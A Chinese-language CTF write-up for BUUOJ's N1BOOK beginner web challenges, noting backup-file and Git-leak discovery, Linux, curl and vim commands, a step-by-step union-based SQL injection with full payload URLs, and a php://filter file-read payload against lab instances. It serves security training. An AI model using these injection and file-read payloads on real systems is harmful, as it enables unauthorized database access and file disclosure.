今天上線BUUOJ的時候發現多了一欄N1BOOK。
持續更新中~
[第一章 web入門]常見的搜集
掃一下
發現存在robots.txt
,index.php~
,.index.php.swp
三個文件,分別存放了flag的3個部分
robots.txt
:告訴爬蟲哪些頁面可以爬取index.php~
:php的備份有兩種:*.php~
和*.php.bak
.index.php.swp
:當vim出現異常會產生.swp
文件,可以通過vim -r .index.php.swp
恢復文件
linux操作
這邊也順便記錄下linux下的一些操作
- 在linux下,
.開頭的文件
是隱藏文件,需要ls -a
可以查看 rm -f
刪除文件(force的意思)不提示任何信息直接刪除- wget命令從url下載文件
wget http://80ac1284-dfea-405f-a858-594f5fa545dd.node3.buuoj.cn/.index.php.swp
- curl命令
curl -O http://80ac1284-dfea-405f-a858-594f5fa545dd.node3.buuoj.cn/.index.php.swp
-o
-o
參數將服務器的回應保存成文件,等同於wget
命令。curl -o example.html https://www.example.com
上面命令將
www.example.com
保存成example.html
。-O
-O
參數將服務器回應保存成文件,並將 URL 的最后部分當作文件名。curl -O https://www.example.com/foo/bar.html
上面命令將服務器回應保存成文件,文件名為
bar.html
。
-
vim常用指令
常用退出命令
先ESC跳到命令模式
然后
:w(保存文件不退出)
:w!(強制保存不退出)
:wq(保存並退出)
:wq!(強制保存並退出)
:q(不保存退出)
:q!(不保存強制退出)
:e!(放棄修改,從上次保存文件開始再編輯)
常用插入命令
i 在當前位置生前插入
I 在當前行首插入
a 在當前位置后插入
A 在當前行尾插入
o 在當前行之后插入一行
O 在當前行之前插入一行
常用查找命令
/flag 回車后查找flag,按n鍵查找下一個
[第一章 web入門]粗心的小李
沒什么好說的,Git源碼泄露
python2.7 git_extract.py http://209e0d28-4b4b-472c-83a7-5c44b973cb2a.node3.buuoj.cn/.git/
源碼里index.html
找到flag
[第一章 web入門]SQL注入-1
存在字符型注入
用union select測試哪一列有回顯
http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,2,3--+
開始注入
查表名
http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,group_concat(table_name),1%20from%20information_schema.tables%20where%20table_schema=database()--+
查列名
http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,group_concat(column_name),1%20from%20information_schema.columns%20where%20table_name=%27fl4g%27--+
查flag
http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,fllllag,1%20from%20fl4g--+
[第一章 web入門]afr_1
偽協議讀取
http://04e270ee-476a-49d2-8aa4-6f9e49ce90ef.node3.buuoj.cn/?p=php://filter/read=convert.base64-encode/resource=flag
base64解碼得到flag